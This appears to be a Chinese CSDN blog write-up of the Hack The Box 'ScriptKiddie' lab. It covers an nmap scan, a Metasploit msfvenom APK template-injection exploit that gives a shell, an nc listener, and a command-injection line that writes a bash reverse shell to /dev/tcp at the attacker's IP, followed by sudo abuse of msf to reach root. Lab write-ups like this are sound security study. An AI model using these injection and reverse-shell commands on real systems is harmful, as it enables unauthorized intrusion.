ScriptKiddie

最新推荐文章于 2022-09-21 10:11:41 发布
最新推荐文章于 2022-09-21 10:11:41 发布
阅读量318 收藏
点赞数
分类专栏: Hack The Box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40569903/article/details/114466358
版权

HTB ScriptKiddie

简介

靶机名为脚本小子,os为Linux,难度不高
在这里插入图片描述

信息收集

nmap --min-rate 10000 -sV -p- 10.10.10.226
在这里插入图片描述

22和5000端口开放,可以看到运行着werkzeug,是一个WSGI工具包,首先查看一下是否存在已知的洞,发现并不适用。直接访问一手。
在这里插入图片描述

发现是一个工具库。漏洞就在其中。

漏洞寻找

首先看看nmap,发现时7.8,没什么可以利用的。
在这里插入图片描述
在这里插入图片描述
Venom看看有没有什么可利用的。
发现存在apk模版注入。
在这里插入图片描述

漏洞利用

msf利用起来。
发现只需要两个参数,监听地址和端口,直接输入HTB的地址就可以,默认端口是4444。exploit后会生成apk文件。

首先nc监听4444端口。
nc -lvvp 4444

利用生成的apk完成连接,os选择安卓,地址填入lhost,generate。
在这里插入图片描述

获得shell。
在这里插入图片描述

GetFlag

首先查看目录下有什么好东西不,发现了userflag。
在这里插入图片描述

在home下发现两个用户,whoami发现当前用户是kid,查看另一个用户pwn。建议连接直接用bash。
在这里插入图片描述

打开.sh文件,发现是一个脚本。
语句为真时执行nmap的扫描语句,否则将信息写入hackers文件。
在这里插入图片描述

断网了,第二天换个ip,直接利用一下,注意echo后的两个空格,调整注入的内容,可以自己试一试就会发现问题所在。
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.85/1234 0>&1' #" >> hackers
在这里插入图片描述

nc连接。
在这里插入图片描述

此时我们要注意这个用户是否拥有带有root命令的权限,sudo -l发现可以以root执行msf。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9BzdiCpu-1615049717473)(assets/%E6%88%AA%E5%B1%8F2021-03-07%2000.43.46.png)]

自然不必多说,打开msf,拿到root的flag。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-10WEZarm-1615049717473)(assets/%E6%88%AA%E5%B1%8F2021-03-07%2000.45.41.png)]

总结

正如靶机题目所言,只需要找到漏洞点msfvenom就可以成功打入,并不是很难。

T1me0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pynuke128:我在2020年初制作的一个脚本小子脚本,由于种种原因,我试图隐藏它,以至于我想通过修改就可以破坏这个世界。 哦,我真是天真。 我最尴尬的Forkbomb项目
03-05
Pynuke128:我在2020年初制作的一个脚本小子脚本,由于种种原因,我试图隐藏它,以至于我想通过修改就可以破坏这个世界。 哦,我真是天真。 我最尴尬的Forkbomb项目
Script kiddie
wusuopuBUPT的专栏
02-27 1921
In hacker culture a script kiddie or skiddie (also known as skid, script bunny, script kitty), are unskilled individuals who use scripts or programs developed by others to attack computer systems and
HTB-ScriptKiddie
TA不懒,但还没有添加简介
09-18 224
HTB-ScriptKiddie
Hack The Box——ScriptKiddie
热门推荐
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
获得称号:脚本小子(Script _Kiddie)
exi3ted的博客
03-13 619
任务达成:学习并使用一次arp断网攻击.(不完全arp欺骗)//其中 -i 后的网卡是指自己的网卡.
靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
qq_57976347的博客
02-18 489
一、环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二、信息收集 1.nmap命令扫描靶机 先用ifconfig查看kali的IP,因为kali和靶机都是NAT模式下,所以用 nmap 192.168.101.0/24 扫描得到靶机ip 再使用命令查看靶机开放的端口和协议:nmap -sV -A 192.168.101.112 2.利用扫描到端口 (1)开放21、22、8
HackTheBox | ScriptKiddie
Purpose_7的博客
04-22 165
HackTheBox ScriptKiddle
HackTheBox - ScriptKiddie(CVE-2020-7384)
z4yn:)的博客
04-21 456
ScriptKiddie #0 信息收集 Namp 扫描端口,根据端口开放情况切入点应该在5000端口上。 ─[sg-vip-1]─[10.10.14.19]─[htb-z4yn@htb-2t3aamavbq]─[~] └──╼ [★]$ nmap 10.10.10.226 -p- Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-20 02:13 UTC Nmap scan report for 10.10.10.226 Host is up..
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11(Scriptkiddie
Aluxian_的博客
09-21 993
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第十一个靶机了 也是最后一个比较简单1.信息收集 获取ip地址 和端口信息2.metasploit的基本操作3. 了解后门命令执行漏洞这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助!至此这个系列更新完啦!🙂。
靶机:Funbox: Scriptkiddie
weixin_50339323的博客
09-14 375
一、信息收集 1. 获取靶机IP (在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件) 2. 扫描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 扫目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan扫描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
FUNBOX: SCRIPTKIDDIE 靶场
小小猪的博客
09-09 496
获得python交互shell,查看文件。爆破目录,发现wp-admin目录。查看文件,发现proftpd利用方式。配置完成,执行,获得shell。nmap扫描靶机端口以及服务。配置完成,还需要导入监听模块。查看到21端口开放的服务。导入模块,查看相关配置。访问之后发现无法利用。
vulnhub之Funbox: Scriptkiddie
qwweggfe的博客
08-29 322
靶机ip:192.168.181.155 kali IP : 192.168.181.129 首先进行IP扫描 然后我查看ip端口开启哪些服务 我们看见他开启了80端口,于是我们打开网页进行查看 于是我进行目录探测,看看他有没有给我们一些提示 gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 于是我认为他们开...
vulnhub--Funbox: Scriptkiddie
venu_s的博客
08-16 620
靶机介绍 Difficult: As always, it’s a very easy box for beginners. Goal: Get flag Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.0.128/24 端口扫描 nmap -sV -p- -A 192.168.0.131 nmap扫描结果 并不能用 anonymous
android手机应用源码Imsdroid语音视频通话源码.rar
05-20
android手机应用源码Imsdroid语音视频通话源码.rar
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
05-20
营销计划汇报PPT,市场品牌 推广渠道 产品 营销策略tbb.pptx
JavaScript_超过100种语言的纯Javascript OCR.zip
05-20
JavaScript
JavaScript_跨平台React UI包.zip
05-20
JavaScript
node-v16.17.0-headers.tar.xz
最新发布
05-20
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
520表白代码.rar
05-20
520表白html5爱心代码
一个简单的HTML5和CSS代码示例,用于创建一个动态的爱心形状,并在网页上展示一个类似520表白的消息 这个示例使用了CSS的
05-20
520表白html5爱心代码 一个简单的HTML5和CSS代码示例,用于创建一个动态的爱心形状,并在网页上展示一个类似520表白的消息。这个示例使用了CSS的动画效果和HTML的结构。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值